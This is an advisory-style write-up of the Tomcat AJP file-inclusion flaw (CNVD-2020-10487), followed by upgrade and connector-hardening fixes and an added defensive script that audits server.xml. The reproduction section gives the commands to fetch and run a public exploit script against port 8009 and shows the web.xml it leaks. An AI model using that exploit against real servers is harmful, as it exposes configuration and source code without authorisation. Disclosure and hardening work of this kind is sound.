1. Vulnerability description

Tomcat enables the AJP service (port 8009) by default, and that service contains a file inclusion flaw. An attacker can craft a malicious request to perform file inclusion and thereby read or include any file under any webapp directory on the Tomcat instance, such as webapp configuration files or source code.
2. Reproduction

- Start an affected Tomcat version locally; this article uses apache-tomcat-8.5.16.
- Download the Python script used for reproduction (it requires Python 2.7):
  git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi.git
- Use conda to create the environment the script needs (the conda installation itself is omitted; this article uses Miniconda):
  # create a virtual environment named CNVD-2020-10487-Tomcat-Ajp-lfi with Python 2.7
  conda create -n CNVD-2020-10487-Tomcat-Ajp-lfi python=2.7
  # activate the CNVD-2020-10487-Tomcat-Ajp-lfi environment
  conda activate CNVD-2020-10487-Tomcat-Ajp-lfi
- Use the script to read a file through the vulnerability:
  python ./CNVD-2020-10487-Tomcat-Ajp-lfi.py 127.0.0.1 -p 8009 -f WEB-INF/web.xml
- The console prints the content of the requested file:
  Getting resource at ajp13://127.0.0.1:8009/asdf
  ----------------------------
  <?xml version="1.0" encoding="UTF-8"?>
  <!--
    Licensed to the Apache Software Foundation (ASF) under one or more
    contributor license agreements.  See the NOTICE file distributed with
    this work for additional information regarding copyright ownership.
    The ASF licenses this file to You under the Apache License, Version 2.0
    (the "License"); you may not use this file except in compliance with
    the License.  You may obtain a copy of the License at

        http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.
  -->
  <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                        http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
    version="3.1"
    metadata-complete="true">

    <display-name>Welcome to Tomcat</display-name>
    <description>
       Welcome to Tomcat
    </description>

  </web-app>
3. Fix

- The first recommendation is to upgrade Tomcat to version 9.0.31, 8.5.51 or 7.0.100 or later.
- If you cannot upgrade, consider temporarily disabling the AJP connector on port 8009: in conf/server.xml under the Tomcat root directory, comment out
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
- If the AJP protocol is needed (not verified by me; provided for reference only, please verify feasibility yourself):
  - change the default port
  - configure a secret for the AJP Connector
  <Connector port="18009" protocol="AJP/1.3" redirectPort="8443" address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>
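To turn the mitigations above into a repeatable check, here is an added example (not code from the original post or from the Tomcat project) that audits a server.xml for active AJP connectors and reports the weak settings the fix section names: the default port 8009, no `address` binding, and no `secret`. It also flags `secretRequired="false"`, an attribute that exists in the patched Tomcat versions listed above. The two server.xml fragments are constructed samples (the "before" and "after" of the fix), and the secret value is a placeholder.

```python
"""Audit a Tomcat server.xml for AJP connector hardening.

Added example, not the post's or Tomcat's own code. The XML fragments
below are constructed samples that mirror the stock and hardened
configurations discussed in the fix section.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the stock layout, AJP on 8009 with no secret and
# no address binding (the configuration the vulnerability targets).
WEAK_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  </Service>
</Server>
"""

# Constructed sample: the hardened layout from the fix section. The old
# connector is commented out; the new one uses a non-default port, binds
# to loopback and carries a shared secret (placeholder value).
HARDENED_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
    <Connector port="18009" protocol="AJP/1.3" redirectPort="8443"
               address="127.0.0.1" secret="REPLACE_WITH_LONG_RANDOM_SECRET" />
  </Service>
</Server>
"""


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one findings dict per active AJP <Connector>.

    Commented-out connectors are dropped by the XML parser, which matches
    Tomcat's own behaviour: only live <Connector> elements open a listener.
    """
    root = ET.fromstring(server_xml)
    findings = []
    for conn in root.iter("Connector"):
        # Tomcat defaults to HTTP/1.1 when protocol is absent; AJP may be
        # spelled "AJP/1.3" or as a fully qualified Ajp*Protocol class name.
        protocol = conn.get("protocol", "HTTP/1.1")
        if "ajp" not in protocol.lower():
            continue
        port = conn.get("port", "")
        address = conn.get("address", "")
        secret = conn.get("secret", "")
        secret_required = conn.get("secretRequired", "")

        issues = []
        if port == "8009":
            issues.append("default AJP port 8009")
        if address in ("", "0.0.0.0", "::"):
            issues.append("bound to all interfaces (no 'address' or wildcard)")
        if not secret:
            issues.append("no 'secret' configured")
        if secret_required.lower() == "false":
            issues.append("secretRequired explicitly disabled")
        findings.append({"port": port, "address": address, "issues": issues})
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        for f in audit_ajp_connectors(xml_text):
            status = "OK" if not f["issues"] else "; ".join(f["issues"])
            print(f"[{label}] AJP connector port={f['port']} address={f['address']!r}: {status}")
```

Run it against a real conf/server.xml by passing the file's contents to `audit_ajp_connectors`; an empty `issues` list for every AJP connector (or no AJP connectors at all) is the state the fix section is aiming for. Note that the parser only sees what is in server.xml, so it will not catch an AJP listener opened by a separately loaded configuration; pair the check with a port scan of 8009 from the network side if you want confirmation that nothing is listening.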